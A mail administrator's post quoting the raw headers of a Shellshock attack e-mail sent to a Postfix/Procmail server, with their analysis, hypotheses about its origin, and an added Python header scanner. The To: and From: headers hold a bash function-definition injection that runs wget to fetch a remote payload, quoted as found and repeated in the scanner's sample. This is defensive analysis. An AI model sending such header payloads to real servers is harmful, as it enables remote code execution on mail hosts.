Two days ago I received the following e-mail (this is its original format, not that of any mailer, except that sensitive information is replaced by ••field_name••):
```
From qqqqqq@freemail.net  Thu Jul  2 23:59:07 2015
Return-Path: <qqqqqq@freemail.net>
X-Original-To: nobody@••my_domain••
Delivered-To: nobody@••my_domain••
Received: from website.com (bearing.headissue.net [178.248.246.217])
        by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901
        for <nobody@••my_domain••>; Thu,  2 Jul 2015 23:59:07 +0200 (CEST)
To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
Status: RO
Content-Length: 0
Lines: 0
```
- attack targeted toward Postfix MX where the MDA is Procmail
- the `To:` & `From:` fields are aimed at firing the Shellshock on `bash`, which is frequently used within Procmail rules
- this attack would have downloaded a malware from a download site in Siliguri (India) within `/tmp/._` (file hidden to the dummies)
- in case of an existing `/etc/procmailrc`, which is executed with `root` privileges, nothing more risky would have been automatically run
- the origin of the connection is in München, near the University
- the origin (@IP) of the attack is on but not replying to any `tcp` connection
- the HTML potential malware leads to a 404
 
Here are a few personal hypotheses about this attack:
- the downloader site (mlanissan.co.in) was hacked, used, detected and cleaned by its owners
- the attack control site (bearing.headissue.net) is most probably running Unix, was hacked, used and not yet halted by its due owners; it is well protected by the hackers
 
Are my analysis and hypotheses right?
Do you have any better analysis and hypotheses?
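
A header check a mail administrator could run over a spool or quarantine to find messages shaped like the one above. This is an added example, not part of the original post; the host names, addresses and the `scan_headers` helper are constructed for illustration.

```python
import re
from email import message_from_string
from email.policy import compat32

# Bash function-definition prefix "() {" at the start of a header value: the
# Shellshock trigger if the value is exported to the environment of a bash child.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")
# IPv4 address in square brackets, as the receiving MTA records it in Received.
RELAY_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Constructed sample with the same shape as the message in the post;
# every host name and address is a placeholder.
SAMPLE = """\
Return-Path: <sender@example.invalid>
Received: from website.example (relay.example.invalid [192.0.2.10])
        by mx.example.invalid (Postfix) with SMTP id 0000000000000
        for <nobody@example.invalid>; Thu,  2 Jul 2015 23:59:07 +0200 (CEST)
To:() { :; };wget -o/tmp/._ http://downloader.example.invalid/HELLOWORLD
From:() { :; };wget -o/tmp/._ http://downloader.example.invalid/HELLOWORLD
Subject: harmless
Content-Length: 0

"""


def scan_headers(raw_message):
    """Return (names of suspicious headers, relay IPs from Received headers)."""
    # compat32 keeps header values as raw strings, so malformed address
    # headers such as the To:/From: above are not rewritten by the parser.
    msg = message_from_string(raw_message, policy=compat32)
    hits = [name for name, value in msg.items()
            if SHELLSHOCK_RE.match(str(value))]
    relays = []
    for received in msg.get_all("Received", []):
        # Folded Received headers keep their continuation lines in the value.
        relays.extend(RELAY_IP_RE.findall(str(received)))
    return hits, relays


if __name__ == "__main__":
    hits, relays = scan_headers(SAMPLE)
    print("headers carrying a function definition:", hits)
    print("relay addresses to look up in the MTA log:", relays)
```

The relay address comes from the `Received` line written by the receiving server, which is the only part of the message the sender does not control.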